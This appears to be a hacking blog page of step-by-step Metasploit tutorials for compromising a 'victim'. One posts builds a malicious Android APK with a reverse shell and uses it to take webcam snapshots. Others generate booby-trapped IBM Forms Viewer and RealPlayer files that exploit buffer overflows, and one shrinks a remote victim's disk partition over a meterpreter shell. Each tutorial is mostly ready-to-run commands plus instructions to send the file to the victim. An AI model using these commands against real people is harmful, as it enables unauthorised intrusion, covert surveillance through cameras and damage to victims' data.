Shrink the Partition of Remote Victim PC

at 8:02 AM Monday, February 10, 2014 0 comments
First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target.

Type Diskpart in command prompt and press Enter key

Then type List disk and press enter, this will show you list of all drives


Now select the drive typically, in Windows 7, this should be disk 0 and partition 2, but please make sure you do select the right disk and partition before continuing

Select disk 0
Select partition 2


Now type shrink querymax this command will return the maximum number of bytes that the volume can be reduced

To perform a shrink to a certain amount, add the desired parameter with the number of megabytes by which to shrink. Shrink desired=2000

You may check the new partition size by running the list command, again. List partition

Labels: ,

Hack Android Phone with Metasploit in Kali Linux

at 7:48 PM Thursday, January 23, 2014 4 comments
Open Kali Linux Terminal and type


msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.6 lport= 443 R > /root/Desktop/files.apk


-p for payload
android/meterpreter/reverse_tcp
Lhost (IP address of your local host)
192.168.1.6
Lport (Port of your local pc)
443
-x format
Output format

Now we successfully generate the malicious apk File, it will stored on your local computer

/root/Desktop/files.apk

Now open your kli linux terminal and type msfconsole


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.6
set lport 443
exploit

Now send your files.apk files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim Android Phone.


LS
As in Linux, the ‘ls’ command will list the files in the current remote directory.


PS
The ‘ps’ command displays a list of running processes on the target.


Webcam_list

This command provides you a list of all webcams on the target system. Each webcam will have an index number.

Webcam_snap 1

This command take a snapshot for the specified webcam, by default number 1 and will try without argument precision to open the saved snapshot

Labels: ,

Remotely Scan Malware/Virus in Victim PC with Metasploit

at 2:04 AM Monday, January 13, 2014 0 comments
This module will check a file for malware on VirusTotal based on the checksum.

Exploit Targets
Windows 7
Windows XP

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open Kali Linux terminal type msfconsole


Now type use post/multi/gather/check_malware
msf exploit (check_malware)>set REMOTEFILE (Path of the file you want to scan)
msf exploit (check_malware)>set session 1

msf exploit (check_malware)>exploit


Labels: ,

Hack Remote Windows 7 PC Using IBM Forms Viewer Unicode Buffer Overflow

at 1:51 AM Saturday, December 28, 2013 0 comments
This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed XFDL files, with a long fontname value. This module has been tested successfully on IBM Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.

Exploit Targets
Windows XP SP 3
IBM Forms Viewer 4.0

Requirement
Attacker: Kali Linux
Victim PC: Windows 7

Open Kali Linux terminal type msfconsole


Now type use exploit/windows/fileformat/ibm_forms_viewer_fontname
msf exploit (ibm_forms_viewer_fontname)>set payload windows/meterpreter/reverse_tcp
msf exploit (ibm_forms_viewer_fontname)>set lhost 192.168.1.113 (IP of Local Host)
msf exploit (ibm_forms_viewer_fontname)>exploit


After we successfully generate the malicious xfdl File, it will stored on your local computer
/root/.msf4/local/msf.xfdl


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.113
exploit

Now send your msf.xfdl files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


Labels: ,

Hack Remote PC Using Real Networks RealPlayer Version Attribute Buffer Overflow

at 12:27 AM Friday, December 27, 2013 0 comments
This module exploits a stack-based buffer overflow vulnerability in version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by improper bounds checking of the version and encoding attributes inside the XML declaration. By persuading the victim to open a specially-crafted .RMP file, a remote attacker could execute arbitrary code on the system or cause the application to crash

Exploit Targets
Windows XP SP 3
Real Player 16.0.3.51
Real Player  16.0.2.32

Requirement
Attacker: Kali Linux
Victim PC: Windows XP

Open Kali Linux terminal type msfconsole


Now type use exploit/windows/fileformat/realplayer_ver_attribute_bof
msf exploit (realplayer_ver_attribute_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (realplayer_ver_attribute_bof)>set lhost 192.168.1.102 (IP of Local Host)
msf exploit (realplayer_ver_attribute_bof)>exploit


After we successfully generate the malicious rmp File, it will stored on your local computer
/root/.msf4/local/msf.rmp


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.102
exploit

Now send your msf.rmp files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


Subscribe to: Posts (Atom)